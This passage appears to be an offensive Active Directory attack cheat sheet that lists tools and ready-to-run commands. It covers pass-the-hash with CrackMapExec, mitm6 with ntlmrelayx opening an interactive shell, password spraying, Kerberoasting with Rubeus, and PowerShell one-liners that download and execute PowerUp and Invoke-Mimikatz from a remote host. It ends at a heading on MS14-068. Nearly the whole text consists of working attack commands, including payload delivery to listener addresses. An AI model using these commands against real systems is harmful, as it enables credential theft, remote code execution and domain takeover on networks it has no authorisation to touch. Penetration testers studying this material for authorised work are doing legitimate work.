Summary

Tools

• Impacket or the Windows version

• Responder

• Mimikatz

• Ranger

• BloodHound

  apt install bloodhound #kali neo4j console Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j ./bloodhound SharpHound.exe (from resources/Ingestor) SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 SharpHound.exe -c all -d active.htb -SearchForest SharpHound.exe --EncryptZip --ZipFilename export.zip or Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public or bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all

• AdExplorer

• CrackMapExec

  apt-get install -y libssl-dev libffi-dev python-dev build-essential git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec crackmapexec smb -L crackmapexec smb -M name_module -o VAR=DATA crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares crackmapexec 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz crackmapexec mimikatz --server http --server-port 80

• Mitm6

  git clone https://github.com/fox-it/mitm6.git && cd mitm6 pip install . mitm6 -d lab.local ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i

  -wh: Server hosting WPAD file (Attacker’s IP)

  -t: Target (You cannot relay credentials to the same device that you’re spoofing)

  -i: open an interactive shell

  ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access

• PowerSploit

  powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"

• ADRecon

  .\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser

• Active Directory Assessment and Privilege Escalation Script

  powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1

• Ping Castle

  pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession pingcastle.exe --healthcheck --server domain.local pingcastle.exe --graph --server domain.local pingcastle.exe --scanner scanner_name --server domain.local available scanners are:aclcheck,antivirus,corruptADDatabase,foreignusers,laps_bitlocker,localadmin,ullsession,nullsession-trust,share,smb,spooler,startup

• Kerbrute

  ./kerbrute passwordspray -d <DOMAIN> <USERS.TXT> <PASSWORD>

• Rubeus

  Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ptt] [/luid] Rubeus.exe dump [/service:SERVICE] [/luid:LOGINID] Rubeus.exe klist [/luid:LOGINID] Rubeus.exe kerberoast [/spn:"blah/blah"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."]

• AutomatedLab

  New-LabDefinition -Name GettingStarted -DefaultVirtualizationEngine HyperV Add-LabMachineDefinition -Name FirstServer -OperatingSystem 'Windows Server 2016 SERVERSTANDARD'Install-Lab Show-LabDeploymentSummary

Most common paths to AD compromise

MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)